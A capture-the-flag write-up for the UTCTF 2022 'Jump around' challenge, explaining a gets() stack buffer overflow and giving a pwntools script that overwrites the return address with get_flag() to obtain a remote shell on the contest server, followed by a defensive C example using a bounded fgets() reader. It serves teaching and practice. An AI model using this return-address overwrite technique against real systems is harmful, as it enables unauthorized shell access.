UTCTF 2022 — Writeup

I did some of the challenges in UTCTF 2022, so I would like to share my writeups for them.
- Jump around

This is a beginner challenge based on a stack buffer overflow.
We are given the binary. To analyse it we can use a tool like Ghidra or IDA; I used Ghidra and looked at the functions through its decompiler.
The main function is not very informative: it simply reads input from the user.

Looking through the functions in the binary, I found a ‘get_flag’ function, which is suspicious because nothing in main ever calls it.

It simply calls the system function with ‘/bin/sh’. If we can redirect execution to it, we get shell access on the server.

Since main reads the input with gets(), which performs no bounds check and is therefore vulnerable to a buffer overflow, we can overwrite the return address with the address of get_flag(). I wrote the following pwntools script to get an interactive shell (the original used `elf.ELF(...)`, which is not a pwntools name; the class is `ELF`, and `recvuntil` wants bytes):

from pwn import *

# Resolve the address of get_flag() from the local copy of the binary
# (the binary is not position independent, so the symbol address is fixed).
e = ELF('./jump')

r = remote('pwn.utctf.live', 5001)
r.recvuntil(b'drill')  # wait for the prompt before sending input

# 112 bytes of buffer + 8 bytes of saved rbp = 120 bytes of padding,
# then the address of get_flag() in place of the saved return address.
payload = b'a' * 120 + p64(e.symbols['get_flag']) + b'\n'
r.sendline(payload)
r.interactive()
The payload has two parts. First we overflow the buffer: from the decompiled code we know the buffer is 112 bytes, and since this is a 64-bit binary the next 8 bytes on the stack are the saved rbp (base pointer), so 112+8 = 120 bytes of padding brings us to the saved return address, the slot rsp points at when main returns. Second, we write the address of get_flag() into that slot, so when main executes its ret instruction it jumps to get_flag() and we get the shell. Then we send this payload to the server.
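To make the root cause concrete from the defender's side, here is an added example (not the challenge binary and not part of the original writeup) of the same stack layout with the unbounded gets() replaced by a bounded fgets() reader. The 112-byte buffer size and the 8-byte saved rbp come from the writeup; the function names and the input are my own construction. The reader reads at most bufsz-1 bytes and drains the rest of an over-long line instead of writing it past the buffer, so a 200-byte line can no longer reach the saved return address.

```c
#include <stdio.h>
#include <string.h>

/* Added example: the challenge reads user input with gets() into a 112-byte
 * stack buffer, so any line longer than 112 bytes runs past the buffer, over
 * the 8-byte saved rbp and into the saved return address. The reader below
 * replaces gets() with a bounded fgets() read (hypothetical helper names). */

#define BUF_SIZE 112

/* Read one line into buf (at most bufsz-1 bytes plus a NUL terminator).
 * Any excess input on the same line is drained and counted rather than
 * written past the buffer.
 * Returns the number of discarded bytes, or -1 on EOF with no data. */
long read_line_bounded(char *buf, size_t bufsz, FILE *in)
{
    if (fgets(buf, (int)bufsz, in) == NULL)
        return -1;

    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';        /* whole line fit: strip the newline */
        return 0;
    }

    /* The line was longer than the buffer: discard the rest of it so the
     * next read starts on a fresh line instead of the leftover bytes. */
    long dropped = 0;
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        dropped++;
    return dropped;
}

/* Offset from the start of a stack buffer to the saved return address on
 * x86-64 when the buffer sits directly below the saved rbp: buffer size plus
 * the 8-byte saved rbp. For the challenge's 112-byte buffer this is the 120
 * bytes of padding used in the payload above. */
size_t return_address_offset(size_t buf_size)
{
    return buf_size + 8;
}

int main(void)
{
    char buf[BUF_SIZE];
    long dropped = read_line_bounded(buf, sizeof buf, stdin);
    if (dropped < 0)
        return 1;
    printf("read %zu bytes, discarded %ld (return address at offset %zu)\n",
           strlen(buf), dropped, return_address_offset(sizeof buf));
    return 0;
}
```

Running it and pasting a line of 200 characters reports 111 bytes read and 89 discarded; the same input against the gets() version is exactly the payload shape the exploit above relies on.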